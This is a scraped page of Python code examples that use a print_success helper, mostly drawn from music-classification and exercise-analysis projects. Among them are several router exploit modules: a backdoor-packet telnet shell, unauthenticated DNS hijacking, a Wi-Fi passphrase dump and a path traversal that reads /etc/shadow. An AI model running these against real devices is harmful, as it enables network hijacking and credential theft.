Ejemplo n.º 1
0
    def do_check(self, arg):
        utils.print_info('checking if module loaded')
        if not self.check_module_loaded():
            utils.print_failed(
                'checking module failed\n'
                'Please make sure you have already choose one module')
            return

        utils.print_info('checking targets info')
        if not self.check_target_arg():
            utils.print_failed('checking targets info failed\n'
                               'Please make sure you input info target info')
            return
        else:
            utils.print_success('passing checking...')
        target = self.task.get_current()
        if self.module.check(target.host, target.port,
                             self.task.get_timeout()):
            module_name = inspect.getmodule(self.module).__name__[16:]
            exploits = target.affective_exploit
            if not exploits:
                a_exploit = [module_name]
            else:
                if module_name not in exploits:
                    a_exploit = exploits.append(module_name)
                else:
                    a_exploit = exploits
            self.task.set_current(
                ExploitTarget(host=target.host,
                              port=target.port,
                              brand=target.brand,
                              alternative_exploit=target.alternative_exploit,
                              affective_exploit=a_exploit))
Ejemplo n.º 2
0
def extract_features(tracks_dir="tracks/", feat_dir="features/"):
    utils.print_success("Extracting features")
    tracks_fn = os.listdir(tracks_dir)
    utils.create_dir(feat_dir)
    feat_dir = utils.create_dir(feat_dir + "svmbff")
    bextract = "bextract -mfcc -zcrs -ctd -rlf -flx -ws 1024 -as 898 -sv -fe "
    for index, filename in enumerate(tracks_fn):
        utils.print_progress_start(
            str(index) + "/" + str(len(tracks_fn)) + " " + filename)
        track_path = filename + ".mf"
        with open(track_path, "w") as filep:
            filep.write(tracks_dir + filename + "\n")
        new_fn = filename.split(".")[0] + ".arff"
        try:
            os.system(bextract + track_path + " -w " + new_fn +
                      "> /dev/null 2>&1")
        except:
            utils.print_info(
                "You have to make marsyas available systemwide, tips:")
            utils.print_info(
                "http://marsyas.info/doc/manual/marsyas-user/Step_002dby_002dstep-building-instructions.html#Step_002dby_002dstep-building-instructions"
            )
            utils.print_info("http://stackoverflow.com/a/21173918")
            utils.print_error("Program exit")
        # print(new_fn)
        # print(feat_dir + " " + new_fn)
        os.rename(new_fn, feat_dir + new_fn)
        # os.rename("MARSYAS_EMPTY" + new_fn, feat_dir + new_fn)
        os.system("rm " + track_path)
    utils.print_progress_end()
    os.system("rm bextract_single.mf")
Ejemplo n.º 3
0
def table1_exp1(folds_dir):
    utils.print_success("Experiment 1 in Table 1")
    fn_gts = "groundtruths/database1.csv"
    gts = utils.read_groundtruths(fn_gts)
    res_files = [
        name for name in os.listdir(folds_dir)
        if os.path.isfile(os.path.join(folds_dir, name)) and "results" in name
    ]
    acc = []
    f1 = []
    for res in res_files:
        predictions = []
        groundtruths = []
        preds = read_preds(folds_dir + res)
        for name in preds:
            name_gts = name.split(".")[0]
            if name_gts in gts:
                groundtruths.append(gts[name_gts])
                predictions.append(preds[name])
        acc.append(accuracy_score(groundtruths, predictions))
        predictions = [1 if i == "s" else 0 for i in predictions]
        groundtruths = [1 if i == "s" else 0 for i in groundtruths]
        f1.append(f1_score(groundtruths, predictions, average='binary'))
    # Print average ± standard deviation
    utils.print_info("Accuracy " + str(sum(acc) / float(len(acc))) + " ± " +
                     str(stdev(acc)))
    utils.print_info("F-Measure " + str(sum(f1) / float(len(f1))) + " ± " +
                     str(stdev(f1)))
    dir_res = utils.create_dir("stats/")
    with open(dir_res + "table1_accuracy.csv", "a") as filep:
        for val in acc:
            filep.write("SVMBFF," + str(val) + "\n")
    with open(dir_res + "table1_f1.csv", "a") as filep:
        for val in f1:
            filep.write("SVMBFF," + str(val) + "\n")
Ejemplo n.º 4
0
def advice():
    results = analyze('squatData.txt')
    output_advice = pt.get_advice('squat', results)
    ut.print_success('Feedback retrieved')
    advice_file = open('advice_file.txt', 'wb')
    advice_file.write(output_advice)
    advice_file.close()
Ejemplo n.º 5
0
	def analyze_reps(self, exercise, data_file, labels=None, epsilon=0.15, gamma=20, delta=0.5, beta=1, auto_analyze=False, verbose=False):

		reps = [rep for rep in rs.separate_reps(data_file, exercise, self.keys[exercise], keysXYZ.columns)]
		
		if verbose:
			ut.print_success('Reps segmented and normalized for ' + exercise)

		if not auto_analyze:
			return reps
		
		#=====[ Get feature vector  ]=====
		feature_vectors = self.get_prediction_features_opt(exercise, reps, verbose)
		
		#=====[ Get results for classifications and populate dictionary  ]=====
		results = {}

		if verbose:
			print "\n\n###################################################################"
			print "######################## Classification ###########################"
			print "###################################################################\n\n"

		for key in feature_vectors:
		    X = feature_vectors[key]
		    classification = self.classify(exercise, key, X, verbose)
		    results[key] = classification
		    if verbose:
		    	print '\n\n', key ,':\n', classification, '\n'

		#=====[ Print advice based on results  ]=====
		print "\n\n###################################################################"
		print "########################### Feedback ##############################"
		print "###################################################################\n\n"
		return self.get_advice(exercise, results)
def read_train_files(indir, separator=" "):
    """Description of read_train_files

    Gather local features and GT from every individual train songs
    """
    utils.print_success("Reading multiple train files")
    indir = utils.abs_path_dir(indir) + "/"
    groundtruths = []
    features = []
    included_extenstions = ["csv"]
    filenames = [
        fn for fn in os.listdir(indir) if any(
            fn.endswith(ext) for ext in included_extenstions)
    ]
    for index, filename in enumerate(filenames):
        print(str(index + 1) + "/" + str(len(filenames)) + " " + filename)
        sys.stdout.write("\033[F")  # Cursor up one line
        sys.stdout.write("\033[K")  # Clear line
        with open(indir + filename, "r") as filep:
            for row in filep:
                line = row.split(separator)
                features.append([float(i) for i in line[:-1]])
                groundtruths.append(line[-1][:-1])
    sys.stdout.write("\033[K")  # Clear line
    return features, groundtruths
Ejemplo n.º 7
0
    def start(self):
        """
        Start processing the log file.
        """
        print_info(f"Start monitoring {self.log_file}")
        with open(self.log_file) as log_file:
            reader = DictReader(log_file)

            # Keep track of the number of requests in the log window.
            request_counts = []
            while True:
                try:
                    timestamp, average_bytes, most_hit_section, count = self.read_logs(reader, self.log_interval)
                    print_info(f"{timestamp}\t{average_bytes:.2f}\t{most_hit_section}")

                    request_counts.append(count)
                    # Only keep enough counts to cover the time in the log window.
                    request_counts = request_counts[-(self.log_window // self.log_interval):]
                    requests_per_second = sum(request_counts) / self.log_window

                    # Check if the requests per second has exceeded or recovered from the traffic threshold.
                    if requests_per_second >= self.threshold and self.high_traffic is False:
                        print_error(f"High traffic generated an alert - hits = {requests_per_second:.2f} requests per "
                                    f"second, triggered at {timestamp}")
                        self.high_traffic = True
                    elif requests_per_second < self.threshold and self.high_traffic is True:
                        print_success(f"Traffic has stabilized - hits = {requests_per_second:.2f} requests per second, "
                                      f"recovered at {timestamp}")
                        self.high_traffic = False

                    # Simulate time passing. DO NOT USE for real access logs.
                    time.sleep(self.log_interval)
                except StopIteration:
                    print_warning("End of file has been reached.")
                    break
Ejemplo n.º 8
0
    def run(self, host, port, timeout):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10.0)

        utils.print_info("Sending backdoor packet...")

        response = ""
        try:
            sock.sendto("HELODBG", (host, 39889))
            response = sock.recv(1024)
        except Exception as e:
            pass

        sock.close()

        if "Hello" in response:
            utils.print_success("Target seems to vulnerable")
            utils.print_info(
                "Trying to connect to the telnet service {}:{}".format(
                    host, 23))

            try:
                tn = telnetlib.Telnet(host, 23)
                tn.interact()
            except Exception as e:
                utils.print_failed(
                    "Exploit failed - could not connect to the telnet service")
        else:
            utils.print_failed(
                "Exploit failed - target seems to be not vulnerable")
Ejemplo n.º 9
0
    def login(self, host, port, timeout):
        url = 'http://{}:{}/'.format(host, port)
        resp, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, err)
            return False

        utils.print_info('"Retrieving random login token..."')
        token = self.regx_grab(resp.text, r'Frm_Logintoken"\)\.value = "(.*)";', 1)
        if token:
            utils.print_info(
                "Trying to log in with credentials {} : {}".format(self.username, self.password))
            url = 'http://{}:{}/'.format(host, port)
            data = {"Frm_Logintoken": token,
                    "Username": self.username,
                    "Password": self.password,
                    "action": "login"}
            resp, err = self.http_post(self.s, url, timeout, data)
            if err:
                utils.print_warning('{}:{} request error, msg: {}'.format(host, port, type(err).__name__))
                return False
            if "Username" not in resp.text and "Password" not in resp.text:
                utils.print_success("Successful authentication")
                return True
            else:
                return False
        else:
            utils.print_warning('Can not find the login token')
            return False
Ejemplo n.º 10
0
    def analyze_reps(self, exercise, data_file, labels=None, epsilon=0.15, gamma=20, delta=0.5, beta=1,
                     auto_analyze=False, verbose=True):

        reps = [rep for rep in rs.separate_reps(data_file, exercise, self.keys[exercise], keysXYZ.columns)]

        if verbose:
            ut.print_success('Reps segmented and normalized for ' + exercise)

        if not auto_analyze:
            return reps

        # =====[ Get feature vector  ]=====
        feature_vectors = self.get_prediction_features_opt(exercise, reps, verbose)

        # =====[ Get results for classifications and populate dictionary  ]=====
        results = {}

        if verbose:
            print("\n\n###################################################################")
            print("######################## Classification ###########################")
            print("###################################################################\n\n")

        for key in feature_vectors:
            X = feature_vectors[key]

            classification = self.classify(exercise, key, X, verbose)
            results[key] = classification
            if verbose:
                print('\n\n', key, ':\n', classification, '\n')

        # =====[ Print advice based on results  ]=====
        print("\n\n###################################################################")
        print("########################### Feedback ##############################")
        print("###################################################################\n\n")
        return self.get_advice(exercise, results)
Ejemplo n.º 11
0
def run_kea_on_folds(folds_dir):
    """Description of run_kea_on_folds

    Wrapper for kea on folds
    """
    folds_dir = utils.abs_path_dir(folds_dir)
    out_file = folds_dir + "/results.txt"
    if os.path.exists(folds_dir + "/train_test.arff"):
        train_file = folds_dir + "/train_test.arff"
        test_file = train_file
        run_kea(train_file, test_file, out_file)
    else:
        nb_folds = len([
            name for name in os.listdir(folds_dir)
            if os.path.isfile(os.path.join(folds_dir, name))
        ])
        # Run on multiple train/test
        for index in range(1, int(nb_folds / 2) + 1):
            utils.print_success("Train/Test on fold " + str(index))
            train_file = folds_dir + "/train_" + str(index).zfill(2) + ".arff"
            test_file = folds_dir + "/test_" + str(index).zfill(2) + ".arff"
            out_file = folds_dir + "/results_" + str(index).zfill(2) + ".arff"
            run_kea(train_file, test_file, out_file)

        utils.print_warning("TODO multiprocessing")
Ejemplo n.º 12
0
def plot_isrc_year_distribution(isrc_filename="ISRC_valid.txt", img_outdir=""):
    """Description of plot_isrc_year_distribution

    Create a png image of the distribution of ISRCs over the years
    """
    img_outdir = utils.abs_path_dir(img_outdir)
    years = []
    with open(isrc_filename, 'r') as csvfile:
        isrcs = csv.reader(csvfile)
        for isrc in isrcs:
            year = int(isrc[0][5:7]) + 2000
            if year > date.today().year:
                year -= 100
            years.append(year)

    axe = plt.subplot(111)
    hist_bins_range = range(min(years), max(years) + 1, 1)
    plt.hist(years, bins=hist_bins_range, color="#BBBBBB")
    plt.xlabel("Registration years")
    plt.ylabel("ISRC number")
    plt.xlim(min(years) - 2, max(years) + 2)
    axe.spines['top'].set_visible(False)
    axe.spines['right'].set_visible(False)
    axe.get_xaxis().tick_bottom()
    axe.get_yaxis().tick_left()
    plt.savefig(img_outdir + "Figure_1_ISRC_year_distribution.png")
    utils.print_success("ISRC year distribution image saved")
Ejemplo n.º 13
0
    def run(self, host, port, timeout):
        # TODO NOT TESTING
        if self.primary_dns == '':
            p_dns = input('Please input the PRIMARY DNS: ')
            if utils.valid_host(p_dns):
                self.primary_dns = p_dns
            else:
                self.run(host, port, timeout)

        if self.second_dns == '':
            s_dns = input('Please input the SECOND DNS: ')
            if utils.valid_host(s_dns):
                self.second_dns = s_dns
            else:
                self.run(host, port, timeout)

        utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(self.primary_dns, self.second_dns))
        if self.input_to_continue():
            url = 'http://{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}'\
                .format(host, port, self.primary_dns, self.second_dns)
            resp, err = self.http_post(self.s, url, timeout, None)
            if err:
                self.print_requests_err(host, port, err)
                return
            if resp.status_code == 200:
                utils.print_success("DNS settings has been changed")
            else:
                utils.print_failed("Could not change DNS settings")
        else:
            self.primary_dns = ''
            self.second_dns = ''
Ejemplo n.º 14
0
def main():
    begin = int(round(time.time() * 1000))
    PARSER = argparse.ArgumentParser(description="Bayle et al. (2017) algorithm")
    PARSER.add_argument(
        "-d",
        "--indir",
        help="input dir containing all local features extracted by YAAFE",
        type=str,
        default="/media/sf_github/yann/train/",
        metavar="indir")
    PARSER.add_argument(
        "-i",
        "--gts",
        help="input file containing all track groundtruths",
        type=str,
        default="filelist_train.tsv")

    indir = "features/database1/"
    file_gts_track = "groundtruths/database1.csv"
    new_algo_final(indir, file_gts_track)
    # figure1a(PARSER.parse_args().gts)
    # figures1bd(PARSER.parse_args().indir, PARSER.parse_args().gts)
    # figure2(PARSER.parse_args().indir, PARSER.parse_args().gts)
    
    # Local feat processing

    # Global feat processing
    # bayle_fig3()

    utils.print_success("Done in " + str(int(round(time.time() * 1000)) - begin) + "ms")
Ejemplo n.º 15
0
def classify(file_features):
    utils.print_success("Classifying")
    clf = linear_model.RANSACRegressor(random_state=RANDOM_STATE)
    filenames, features, groundtruths = read_file(file_features)
    acc = []
    f1 = []
    skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=RANDOM_STATE)
    for train, test in skf.split(features, groundtruths):
        clf.fit(features[train], groundtruths[train])
        preds_float = clf.predict(features[test])
        predictions = [i >= 0.5 for i in preds_float]
        acc.append(accuracy_score(groundtruths[test], predictions))
        f1.append(f1_score(groundtruths[test], predictions,
                           average="weighted"))
    # Print average +- standard deviation
    print("Accuracy " + str(sum(acc) / float(len(acc))) + " ± " +
          str(stdev(acc)))
    print("F-Measure " + str(sum(f1) / float(len(f1))) + " ± " +
          str(stdev(f1)))
    dir_stats = utils.create_dir("stats/")
    with open(dir_stats + "table1_accuracy.csv", "a") as filep:
        filep.write("GA")
        for val in acc:
            filep.write("," + str(val))
        filep.write("\n")
    with open(dir_stats + "table1_f1.csv", "a") as filep:
        filep.write("GA")
        for val in f1:
            filep.write("," + str(val))
        filep.write("\n")
Ejemplo n.º 16
0
    def run(self, host, port, timeout):
        # TODO NOT TESTING
        if self.info is None:
            url = "http://{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase," \
                  "wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list," \
                  "get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode," \
                  "get_wps_enable,get_wps_current_time&_=1458458152703" \
                .format(host, port)

            resp, err = self.http_get(self.s, url, timeout)
            if err is None:
                if resp.status_code == 200:
                    try:
                        self.info = json.loads(resp.text)
                    except ValueError:
                        pass

        if self.info and len(self.info):
            utils.print_success('Exploit success')
            t = prettytable.PrettyTable()
            t.add_column('Key', list(self.info.keys()))
            t.add_column('Value', list(self.info.values()))
            utils.print_info(t)
            utils.logger.send((host, port, t))

        utils.print_failed('Exploit failed')
Ejemplo n.º 17
0
def preprocess_yaafe_features(dir_features="features/database1/"):
    utils.print_success("Preprocessing YAAFE's features  (approx. 2 minutes)")
    groundtruths = utils.read_groundtruths("groundtruths/database1.csv")
    dir_features = utils.abs_path_dir(dir_features)
    filenames = os.listdir(dir_features)
    dir_tmp = utils.create_dir(utils.create_dir("src/tmp") + "ghosal")
    res_file_name = dir_tmp + "database1.csv"
    res_file = open(res_file_name, "w")
    res_file.write(
        "filename,MFCC_01,MFCC_02,MFCC_03,MFCC_04,MFCC_05,MFCC_06,MFCC_07,MFCC_08,MFCC_09,MFCC_10,MFCC_11,MFCC_12,MFCC_13,tag\n"
    )
    nb_header_lines = 4
    for index, filename in enumerate(filenames):
        utils.print_progress_start(
            str(index + 1) + "/" + str(len(filenames)) + " " + filename)
        with open(dir_features + filename, "r+") as filep:
            tmp_mfcc = np.zeros(shape=(13, 1))
            for line_index, line in enumerate(filep):
                # Skip 5 first header lines generated by YAAFE
                if line_index > nb_header_lines:
                    index = 0
                    mfccs = line[:-1].split(",")
                    for mfcc in mfccs:
                        tmp_mfcc[index] += float(mfcc)
                        index += 1
            tmp_mfcc /= (line_index - nb_header_lines)
            mfcc_str = ["%.15f" % number for number in tmp_mfcc]
            filen = filename.split(".")[0]
            if filen in groundtruths:
                res_file.write(filen + "," + ",".join(mfcc_str) + "," +
                               groundtruths[filen] + "\n")
    res_file.close()
    return res_file_name
Ejemplo n.º 18
0
	def get_prediction_features(self, exercise, reps):
			
		if exercise is 'squat':
			#=====[ Retreives relevant training data for each classifier  ]=====
			X0, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[0.5], predict=True)
			X1, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[0.2, 0.4, 0.6, 0.8], predict=True)
			X3, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95], predict=True)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X= {}
			X['bend_hips_knees'] = preprocessing.StandardScaler().fit_transform(X3['bend_hips_knees'])
			X['stance_width'] = preprocessing.StandardScaler().fit_transform(X1['stance_width'])
			X['squat_depth'] = preprocessing.StandardScaler().fit_transform(X0['squat_depth'])
			X['knees_over_toes'] = preprocessing.StandardScaler().fit_transform(np.concatenate([X3[x] for x in X3],axis=1))
			X['back_hip_angle'] = preprocessing.StandardScaler().fit_transform(np.concatenate([X0[x] for x in X0],axis=1))

		elif exercise is 'pushup':
			#=====[ Retreives relevant training data for each classifier  ]=====
			X3, Y, file_names  = self.extract_pu_features(reps=reps, multiples=[0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95], predict=True)
			X4, Y, file_names = self.extract_pu_features(reps=reps, multiples=[float(x)/100 for x in range(100)], predict=True)

			X30 = np.concatenate([X3[x] for x in X3],axis=1)
			X40 = np.concatenate([X4[x] for x in X4],axis=1)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X = {}
			X['head_back'] = preprocessing.StandardScaler().fit_transform(X40)
			X['knees_straight'] = preprocessing.StandardScaler().fit_transform(X30)
			X['elbow_angle'] = preprocessing.StandardScaler().fit_transform(X3['elbow_angle'])


		ut.print_success('Features extracted for ' + exercise)

		return X
Ejemplo n.º 19
0
def new_algo_final(indir, file_gts_track):
    utils.print_success("Approx. time ~6 hours.")
    # Preprocess arg
    indir = utils.abs_path_dir(indir)
    file_gts_track = utils.abs_path_file(file_gts_track)
    dir_tmp = utils.create_dir(utils.create_dir("src/tmp") + "bayle")
    feat_frame_train = utils.create_dir(dir_tmp + "feat_frame_train")
    feat_frame_test = utils.create_dir(dir_tmp + "feat_frame_test")
    outdir_global = utils.create_dir(dir_tmp + "feat_track")
    feat_train = outdir_global + "train.csv"
    feat_test = outdir_global + "test.csv"
    models_dir = utils.create_dir(dir_tmp + "models")
    loc_feat_testset_dirpath = "features/database2/"
    filelist_train = "groundtruths/database1.csv"
    filelist_test = "groundtruths/database2.csv"
    models_global = utils.create_dir(dir_tmp + "models_track")

    process_local_feat(indir, file_gts_track, outdir_local=feat_frame_train, out_feat_global=feat_train, train=False)
    classify.create_models(outdir=models_dir, train_dir=feat_frame_train, separator=",", classifiers="RandomForest")

    """
    Create features at track scale for the train set
    Features: MFCC + Delta + Double Delta + ngrams + hist
    """
    model_file = "src/tmp/bayle/models/RandomForest/RandomForest.pkl"
    model_file = "/media/sf_DATA/ReproducibleResearchIEEE2017/src/tmp/bayle/models/RandomForest/RandomForest.pkl"
    create_track_feat_testset(indir, filelist_train, feat_train, model_file, train=True)

    # # 15h28m44s to 19h08m28s Done in 13184117ms
    create_track_feat_testset(loc_feat_testset_dirpath, filelist_test, feat_test, model_file)  

    classify.create_models(outdir=models_global, train_file=feat_train, classifiers="RandomForest")
    process_results(feat_train, feat_test)
Ejemplo n.º 20
0
def plot_precision_recall(indir, gts_file, outdir):
    groundtruths = read_item_tag(gts_file)
    plt.figure(1)

    indir = utils.abs_path_dir(indir)
    for item in os.listdir(indir):
        if ".csv" in item:
            isrcs = read_preds(indir + "/" + item)
            test_groundtruths = []
            predictions = []
            for isrc in isrcs:
                if isrc in groundtruths:
                    test_groundtruths.append(groundtruths[isrc])
                    predictions.append(isrcs[isrc])
            test_groundtruths = [tag == "s" for tag in test_groundtruths]
            precision, recall, _ = precision_recall_curve(
                test_groundtruths, predictions)
            plt.plot(recall,
                     precision,
                     label=item[:-4] + " (" + str(
                         round(
                             average_precision_score(test_groundtruths,
                                                     predictions), 3)) + ")")

    plt.xlabel('Recall')
    plt.ylabel('Precision')
    plt.ylim([0.0, 1.05])
    plt.xlim([-0.05, 1.05])
    plt.title('Precision-Recall curve for Algo (AUC)')
    plt.legend(loc='best')
    plt.savefig(outdir + "precision_recall.png", dpi=200, bbox_inches="tight")
    # plt.show()
    plt.close()
    utils.print_success("Precision-Recall curve created in " + outdir)
Ejemplo n.º 21
0
def main(args):
    """
    @brief      Main entry point
    Singer Gender Identification
        Extract features (yaafe)
            voice
            song
        Experiment 1 : 5-CV train voice Test voice
        Experiment 2 : 5-CV train song Test song
        Experiment 3 : train song + voice Test song
        Experiment 4 : train song + voice Test Simbals
        IEEE : train on good frames for instru male female
    """
    utils.print_success("Starting SGI")
    # dir_audio = "E:/_These/DataSets/Recisio/audio/"
    # dir_audio = "/media/sf_SharedFolder/DataSets/Recisio/audio/"
    # kara1k = "../data/filelist.csv"
    # paths = create_filelist(kara1k, dir_audio)
    # available_files = generate_singing_voice_track(paths)
    # extract_features(available_files)
    # extract_features()
    # cpt()
    # remove_silence("gender.txt")
    folder = "/media/sf_DATA/ISMIR2017/features/gender/"
    # add_groundtruths(folder)
    # merge_files(folder, "song_nonzero")
    # merge_files(folder, "sv_nonzero")
    n_folds = 10
    outfilename = folder + "sv_nonzero_results.txt"
    cross_validation(folder + "sv_nonzero.csv", n_folds, outfilename)
    outfilename = folder + "song_nonzero_results.txt"
    cross_validation(folder + "song_nonzero.csv", n_folds, outfilename)
Ejemplo n.º 22
0
def advice():
	results = analyze('squatData.txt')
	output_advice = pt.get_advice('squat',results)
	ut.print_success('Feedback retrieved')
	advice_file = open('advice_file.txt','wb')
	advice_file.write(output_advice)
	advice_file.close()
Ejemplo n.º 23
0
def cover_song_identification():
    """
    @brief      Experiment which tries to identify the cover from an origin song
    
    @return     No return value
    """

    utils.print_success("Reading train and test files")

    # Load train files i.e. origin songs aka origins
    dir_feat_origins = "D:/_Doctorat/ISMIR2017/features/origins/"
    train = {}
    # train = add_feat_yaafe(dir_feat_origins, train)
    train = add_feat_essentia(dir_feat_origins, train)

    # Load test files i.e. cover song(s) aka covers
    dir_feat_covers = "E:/_These/DataSets/Recisio/features/"
    test = {}
    # test = add_feat_yaafe(dir_feat_covers, test, train)
    test = add_feat_essentia(dir_feat_origins, test, train)

    # filen = "test.csv"
    # write2file(train, filen)
    # write2file(test, filen)

    # Train / test and display results
    utils.print_success("Train / test and display results")
    classify.train_test(train, test)
Ejemplo n.º 24
0
def main():
    parser = argparse.ArgumentParser(
        description='It checks the validity of the sign and returns True or False from a public key, a message and a signature')
    parser.add_argument('-s', '--signature', type=str, required=True, help='signature')
    parser.add_argument("-p", "--public_key", type=str, required=True, help='Public key or public aggregate X~')
    parser.add_argument('-m', '--message', type=str, required=True, help='Message')
    
    args = parser.parse_args()
    pubkey = args.public_key
    msg = args.message
    sig = args.signature
    
    try: 
        msg_bytes = sha256(msg.encode())
        sig_bytes = bytes.fromhex(sig)
        pubkey_bytes = bytes.fromhex(pubkey)

        result = schnorr_verify(msg_bytes, pubkey_bytes, sig_bytes)
        print("\nThe signature is: ", sig)
        print("The public key is: ", pubkey)
        print('The message digest is:', msg_bytes.hex())
        print("\nIs the signature valid for this message and this public key? ")
        if result:
            print_success("Yes")
        else:
            print_fails("No")
    except Exception as e:
        print_fails("[e] Exception:", e)
        sys.exit(2)
Ejemplo n.º 25
0
    def run(self, host, port, timeout):
        # TODO NOT TESTING
        if self.primary_dns == '':
            p_dns = input('Please input the PRIMARY DNS: ')
            if utils.valid_host(p_dns):
                self.primary_dns = p_dns
            else:
                self.run(host, port, timeout)

        if self.second_dns == '':
            s_dns = input('Please input the SECOND DNS: ')
            if utils.valid_host(s_dns):
                self.second_dns = s_dns
            else:
                self.run(host, port, timeout)

        utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(
            self.primary_dns, self.second_dns))
        if self.input_to_continue():
            url = "http://{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&" \
                  "dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" \
                .format(host, port, self.primary_dns, self.second_dns)
            resp, err = self.http_post(self.s, url, timeout, None)
            if err:
                self.print_requests_err(host, port, err)
                return
            if resp.status_code == 200:
                utils.print_success("DNS settings has been changed")
            else:
                utils.print_failed("Could not change DNS settings")
        else:
            self.primary_dns = ''
            self.second_dns = ''
def experiment_2():
    utils.print_success("Experiment 2")
    groundtruths_file = "groundtruths/database2.csv"
    dir_pred = "predictions/"
    predictions_files = os.listdir(dir_pred)
    gts = read_item_tag(groundtruths_file)
    for pred_file in predictions_files:
        algo_name = pred_file.split("/")[-1][:-4]
        utils.print_info(algo_name)
        if "Ghosal" in algo_name:
            # Change threshold as RANSAC does not produces pred in [0;1] 
            threshold = 0.
        else:
            threshold = 0.5
        test_groundtruths = []
        predictions = []
        with open(dir_pred + pred_file, "r") as filep:
            for line in filep:
                row = line[:-1].split(",")
                isrc = row[0]
                if isrc in gts:
                    test_groundtruths.append(gts[isrc]) 
                    predictions.append("s" if float(row[1]) > threshold else "i")
        results_experiment_2(algo_name, predictions, test_groundtruths)

    algo_name = "Random"
    utils.print_info(algo_name)
    test_groundtruths = ["s", ] * test_groundtruths.count("s") + ["i", ] * test_groundtruths.count("i")
    predictions = ["s", "i", ] * int(len(test_groundtruths)/2)
    if len(test_groundtruths) % 2:
        predictions += ["s"]
    results_experiment_2(algo_name, predictions, test_groundtruths)
Ejemplo n.º 27
0
    def run(self, host, port, timeout):
        filename = input('Please input filename(default: /etc/shadow): ')
        if filename == '':
            filename = '/etc/shadow'

        url = "{}:{}/cgi-bin/webproc".format(host, port)
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response, err = self.http_post(self.s, url, timeout, data)
        if err:
            self.print_requests_err(host, port, err)
            return

        if response.status_code == 200:
            utils.print_success("Exploit success")
            utils.print_info("File: {}".format(filename))
            utils.print_info(response.text)
        else:
            utils.print_failed("Exploit failed")
def yaafe_feat_extraction(dir_tracks):
    """Description of yaafe_feat_extraction
    yaafe.py -r 22050 -f "mfcc: MFCC blockSize=2048 stepSize=1024" audio_fn.txt
    """
    utils.print_success("YAAFE features extraction (approx. 8 minutes)")
    
    # Assert Python version
    if sys.version_info.major != 2:
        utils.print_error("Yaafe needs Python 2 environment")
    
    # Assert folder exists
    dir_tracks = utils.abs_path_dir(dir_tracks)    
    
    filelist = os.listdir(dir_tracks)
    dir_feat = utils.create_dir(utils.create_dir("features") + "database1")
    # dir_tmp = utils.create_dir("tmp")
    # dir_yaafe = utils.create_dir(dir_tmp + "yaafe")
    # fn_filelist = dir_yaafe + "filelist.txt"
    dir_current = os.getcwd()
    os.chdir(dir_tracks)
    yaafe_cmd = 'yaafe -r 22050 -f "mfcc: MFCC blockSize=2048 stepSize=1024" '
    yaafe_cmd += "--resample -b " + dir_feat + " "
    for index, filen in enumerate(filelist):
        utils.print_progress_start(str(index+1) + "/" + str(len(filelist)) + " " + filen)
        os.system(yaafe_cmd + filen + "> /dev/null 2>&1")
    utils.print_progress_end()
    os.chdir(dir_current)
Ejemplo n.º 29
0
def experiments_2_3(vqmm_cmd, codebook_file):
    utils.print_success("Experiment 2 & 3 (approx. 6h")
    dir_tmp = utils.create_dir(utils.create_dir("src/tmp") + "vqmm")

    # train
    dir_models = utils.create_dir(dir_tmp + "models_expe2_3")
    train(vqmm_cmd, codebook_file, dir_models, dir_tmp + "filelist.txt")

    # Models file
    # Need to explicitly create models_file here for VQMM
    models_list = os.listdir(dir_models)
    models_file = dir_tmp + "models_file_expe2_3.txt"
    with open(models_file, "w") as filep:
        for model_path in models_list:
            if not "NOT" in model_path:
                filep.write(dir_models + model_path + "\n")

    # test
    test_dir = utils.abs_path_dir("features/database2/")
    groundtruths = utils.read_groundtruths("groundtruths/database2.csv")
    test_file_list = os.listdir(test_dir)
    with open(dir_tmp + "test_file_list.txt", "w") as filep:
        for test_filen in test_file_list:
            filep.write(test_dir + test_filen + "\t" +
                        groundtruths[test_filen.split("_")[0]] + "\n")
    dir_res = utils.create_dir(dir_tmp + "results_expe2_3")
    test(vqmm_cmd,
         codebook_file,
         outputdir=dir_res,
         models_file=models_file,
         testfile=dir_tmp + "test_file_list.txt")

    # disp results
    utils.print_success("Experiment 2 & 3 Done processing")
Ejemplo n.º 30
0
def create_cbk(vqmm_cmd, files_list, file_cbk):
    utils.print_success("Creating codebook")
    randomSeed = "1"
    codebookSize = "100"
    subprocess.call([
        vqmm_cmd, '-quiet', 'n', '-list-of-files', files_list, '-random',
        randomSeed, '-codebook-size', codebookSize, '-codebook', file_cbk
    ])
Ejemplo n.º 31
0
 def post(self):
     req_data = request.get_json()
     to_write = open('squatData.txt', 'wb')
     to_write.write(req_data['data'].encode("utf-8"))
     ut.print_success('Data written to file')
     json_res = jsonify(advice())
     ut.print_success('Advice file generated')
     return json_res
Ejemplo n.º 32
0
    def get_prediction_features(self, exercise, reps):

        if exercise is 'squat':
            #=====[ Retreives relevant training data for each classifier  ]=====
            X0, Y, file_names = self.extract_advanced_features(reps=reps,
